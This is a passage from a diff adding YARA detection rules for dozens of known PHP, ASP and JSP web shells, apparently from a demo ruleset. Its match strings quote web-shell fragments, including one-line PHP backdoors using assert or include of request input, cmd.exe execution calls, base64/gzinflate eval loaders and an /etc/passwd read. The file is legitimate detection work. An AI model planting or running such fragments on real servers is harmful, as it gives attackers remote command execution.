+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<?php assert($_REQUEST[\"c\"]);?> " fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_asp_cmdasp_RID2EC1 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file cmdasp.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:28:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+      $s7 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_spjspshell_RID2EEE : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file spjspshell.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:35:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s7 = "Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\\winnt\\system32\\cmd.exe /c type c:" 
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_action_RID2ED0 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file action.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:30:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword
+      $s6 = "<%@ page contentType=\"text/html;charset=gb2312\"%>" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_Inderxer_RID2DE7 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file Inderxer.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:51:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ" 
+   condition: 
+      all of them
+}
+
+rule Webshell_asp_Rader_RID2E37 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file Rader.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:05:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0" 
+      $s3 = "m\" target=inf onClick=\"window.open('?action=help','inf','width=450,height=400 " 
+   condition: 
+      all of them
+}
+
+rule Webshell_c99_madnet_smowu_RID30ED : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file smowu.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:00:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "//Authentication" fullword
+      $s1 = "$login = \"" fullword
+      $s2 = "eval(gzinflate(base64_decode('" 
+      $s4 = "//Pass" 
+      $s5 = "$md5_pass = \"" 
+      $s6 = "//If no pass then hash" 
+   condition: 
+      all of them
+}
+
+rule Webshell_minupload_RID2E6F : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file minupload.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:14:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">   " fullword
+      $s9 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859" 
+   condition: 
+      all of them
+}
+
+rule Webshell_PHP_bug_1__RID2E1A : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file bug (1).php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:00:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "@include($_GET['bug']);" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_caidao_shell_hkmjj_RID31F1 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file hkmjj.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:44:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s6 = "codeds=\"Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\"  " fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_asd_RID2D8A : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file asd.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:36:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%>" fullword
+      $s6 = "<input size=\"100\" value=\"<%=application.getRealPath(\"/\") %>\" name=\"url" 
+   condition: 
+      all of them
+}
+
+rule Webshell_metaslsoft_RID2EE8 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file metaslsoft.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:34:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s7 = "$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>LINK</t" 
+   condition: 
+      all of them
+}
+
+rule Webshell_asp_Ajan_RID2DC3 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file Ajan.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:45:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "entrika.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreate" 
+   condition: 
+      all of them
+}
+
+rule Webshell_h4ntu_shell_powered_by_tsoi__RID361C : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file h4ntu shell powered by tsoi.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 16:41:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>Server Adress:</b" 
+      $s3 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>User Info:</b> ui" 
+      $s4 = "    <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= " 
+      $s5 = "<INPUT TYPE=\"text\" NAME=\"cmd\" value=\"<?php echo stripslashes(htmlentities($" 
+   condition: 
+      all of them
+}
+
+rule Webshell_PHP_a_RID2C4E : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file a.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 09:43:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"" 
+      $s2 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>" 
+      $s4 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p> " fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_RID3866 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 18:19:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "die(\"\\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\\n" 
+      $s1 = "Mode Shell v1.0</font></span></a></font><font face=\"Webdings\" size=\"6\" color" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_SimAttacker_Vrsion_1_0_0_priv8_4_My_friend_RID3A73 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 19:47:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "echo \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fo" 
+      $s3 = "fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_jsp_12302_RID2D4A : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file 12302.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:25:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "</font><%out.print(request.getRealPath(request.getServletPath())); %>" fullword
+      $s1 = "<%@page import=\"java.io.*,java.util.*,java.net.*\"%>" fullword
+      $s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\"" 
+   condition: 
+      all of them
+}
+
+rule Webshell_asp_cmd_RID2D7D : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file cmd.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:34:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+      $s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
+      $s3 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_php_up_RID2D32 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file up.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:21:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);" fullword
+      $s3 = "if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {" fullword
+      $s8 = "echo \"Uploaded file: \" . $HTTP_POST_FILES['userfile']['name'];" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_phpshell3_RID2E39 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file phpshell3.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:05:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_SESSION['nounce'];" 
+      $s5 = "<p>Username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna" 
+      $s7 = "$_SESSION['output'] .= \"cd: could not change to: $new_dir\\n\";" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_B374kPHP_B374k_RID2E83 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file B374k.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:17:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Http://code.google.com/p/b374k-shell" fullword
+      $s1 = "$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'" 
+      $s3 = "Jayalah Indonesiaku & Lyke @ 2013" fullword
+      $s4 = "B374k Vip In Beautify Just For Self" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_phpkit_1_0_odd_RID2FEB : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file odd.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:17:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "include('php://input');" fullword
+      $s1 = "// No eval() calls, no system() calls, nothing normally seen as malicious." fullword
+      $s2 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_123_RID2CE8 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file 123.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:09:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7" 
+      $s3 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\"" 
+      $s9 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">    " fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_ASP_tool_RID2DA7 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file tool.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:41:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Response.Write \"<FORM action=\"\"\" & Request.ServerVariables(\"URL\") & \"\"\"" 
+      $s3 = "Response.Write \"<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='\" " 
+      $s9 = "Response.Write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javas" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_phpkit_0_1a_odd_RID304C : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file odd.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:33:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "include('php://input');" fullword
+      $s3 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
+      $s4 = "// uses include('php://input') to execute arbritary code" fullword
+      $s5 = "// php://input based backdoor" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_PHP_Shell_x3_RID2EEF : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file PHP Shell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:35:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">[" 
+      $s6 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input" 
+      $s9 = "if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_RID41E9 : DEMO EXPLOIT SCRIPT T1087 T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 01:05:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXPLOIT, SCRIPT, T1087, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_Macker_s_Private_PHPShell_RID3444 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file Macker's Private PHPShell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 15:23:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>Server's PHP Version:&n" 
+      $s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">[" 
+      $s7 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type=" 
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_list_RID2E0E : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file list.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:58:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
+      $s2 = "out.print(\") <A Style='Color: \" + fcolor.toString() + \";' HRef='?file=\" + fn" 
+      $s7 = "if(flist[i].canRead() == true) out.print(\"r\" ); else out.print(\"-\");" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_sys3_RID2DE4 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file sys3.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:51:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">" fullword
+      $s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\"" 
+      $s9 = "<%@page contentType=\"text/html;charset=gb2312\"%>" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_php_ghost_RID2E72 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file ghost.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:14:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'" 
+      $s6 = "//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***" 
+      $s7 = "preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(KmU(\"" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_r57_1_4_0_RID2D36 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file r57.1.4.0.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:22:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "@ini_set('error_log',NULL);" fullword
+      $s6 = "$pass='abcdef1234567890abcdef1234567890';" fullword
+      $s7 = "@ini_restore(\"disable_functions\");" fullword
+      $s9 = "@ini_restore(\"safe_mode_exec_dir\");" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_php_moon_RID2E06 : DEMO SCRIPT T1087 T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file moon.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:56:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1087, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "echo '<option value=\"create function backshell returns string soname" 
+      $s3 = "echo      \"<input name='p' type='text' size='27' value='\".dirname(_FILE_).\"" 
+      $s8 = "echo '<option value=\"select cmdshell(\\'net user " 
+   condition: 
+      2 of them
+}
+
+rule Webshell_ELMALISEKER_Backd00r_RID30DA : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file ELMALISEKER Backd00r.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:57:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "response.write(\"<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio" 
+      $s2 = "if FP = \"RefreshFolder\" or request.form(\"cmdOption\")=\"DeleteFolder\" or req" 
+   condition: 
+      all of them
+}
+
+rule Webshell_config_myxx_zend_RID3161 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files config.jsp, myxx.jsp, zend.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:20:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e0354099bee243702eb11df8d0e046df"
+      hash2 = "591ca89a25f06cf01e4345f98a22845c"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = ".println(\"<a href=\\\"javascript:alert('You Are In File Now ! Can Not Pack !');" 
+   condition: 
+      all of them
+}
+
+rule Webshell_browser_201_3_ma_download_RID3412 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, download.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 15:14:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+      hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+      hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "<small>jsp File Browser version <%= VERSION_NR%> by <a" 
+      $s3 = "else if (fName.endsWith(\".mpg\") || fName.endsWith(\".mpeg\") || fName.endsWith" 
+   condition: 
+      all of them
+}
+
+rule Webshell_itsec_itsecteam_shell_jHn_RID34D2 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files itsec.php, itsecteam_shell.php, jHn.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 15:46:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "bd6d3b2763c705a01cc2b3f105a25fa4"
+      hash2 = "40c6ecf77253e805ace85f119fe1cebb"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "echo $head.\"<font face='Tahoma' size='2'>Operating System : \".php_uname().\"<b" 
+      $s5 = "echo \"<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'" 
+   condition: 
+      all of them
+}
+
+rule Webshell_Ghost_Icesword_Silic_RID329D : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files ghost_source.php, icesword.php, silic.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 14:12:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6e20b41c040efb453d57780025a292ae"
+      hash2 = "437d30c94f8eef92dc2f064de4998695"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $" 
+      $s6 = "if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST[" 
+   condition: 
+      all of them
+}
+
+rule Webshell_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_spy2009_m_ma3_xxx_RID3F1D : DEMO SCRIPT T1012 T1050 T1100 WEBSHELL {
+   meta:
+      description = "Detects Web Shell from tennc webshell repo"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 23:06:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+      hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+      hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+      tags = "DEMO, SCRIPT, T1012, T1050, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s8 = "\"<form action=\\\"\"+SHELL_NAME+\"?o=upload\\\" method=\\\"POST\\\" enctype=" 
+      $s9 = "<option value='reg query \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\T" 
+   condition: 
+      all of them
+}
+
+rule Webshell_2_520_job_ma1_ma4_2_RID30B8 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:51:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
